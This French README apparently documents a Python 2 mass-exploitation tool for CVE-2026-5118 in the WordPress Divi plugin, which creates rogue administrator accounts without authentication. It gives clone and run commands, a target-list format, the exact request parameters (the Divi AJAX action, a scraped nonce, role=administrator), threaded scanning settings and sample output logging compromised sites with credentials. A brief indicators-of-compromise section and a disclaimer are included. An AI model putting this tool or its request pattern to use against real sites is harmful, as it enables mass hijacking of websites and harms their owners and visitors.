
CVE-2026-5118 – Exploit de masse Python2 pour le plugin Divi de WordPress : inscription non authentifiée d'un administrateur via admin-ajax.php. Scanner multi‑threadé avec extraction de nonce.
⚠️ AVERTISSEMENT : Cet outil est réservé aux tests d'intrusion autorisés et à la recherche en sécurité uniquement.
L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test. Avertissement supplémentaire : vous pouvez consulter l'avertissement sur la page principale de Jenderal92. Vous pouvez le vérifier ICI !!!
Ce script Python 2 exploite une vulnérabilité d'élévation de privilèges dans le plugin WordPress Divi (et les formulaires Divi associés). Il permet l'enregistrement à distance d'un compte administrateur en :
fb_nonce du formulaire d'inscription Divi de la cible./wp-admin/admin-ajax.php avec role=administrator.https:// si manquant.de_fb_obj).success, user_id, user created, etc.).results.txt au format :https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – incompatible avec Python 3 sans modifications)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Créez un fichier texte contenant un domaine ou une URL par ligne. Vous pouvez omettre http:// / https:// – le script ajoutera https:// par défaut.
Exemple targets.txt :
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
Vous pouvez personnaliser les variables suivantes en haut du script :
https:// si aucun schéma n'est fourni.fb_nonce à l'aide de motifs regex.multipart/form-data contenant :
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<extracted nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailPour les administrateurs WordPress utilisant Divi :
admin-ajax.php.role qui peut être manipulé.Indicateurs de compromission (IOC) :
admin-ajax.php inattendues avec action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator dans les journaux d'accèsCe logiciel est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil. En utilisant ce logiciel, vous acceptez de :
La violation de ces conditions peut entraîner des poursuites pénales, des amendes ou une peine d'emprisonnement.
Les pull requests sont les bienvenues pour les améliorations (portage Python 3, meilleure extraction du nonce, détection de chemins d'inscription supplémentaires). Veuillez conserver l'avertissement éthique.
| Variable | Défaut | Description |
|---|
DEFAULT_USERNAME | Attacker | Nom d'utilisateur à enregistrer |
DEFAULT_PASSWORD | Attacker@123#+ | Mot de passe (robuste avec caractères spéciaux) |
DEFAULT_EMAIL | [email protected] | Adresse e-mail |
THREAD_COUNT | 20 | Nombre de threads simultanés |
OUTPUT_FILE | results.txt | Fichier où enregistrer les cibles compromises |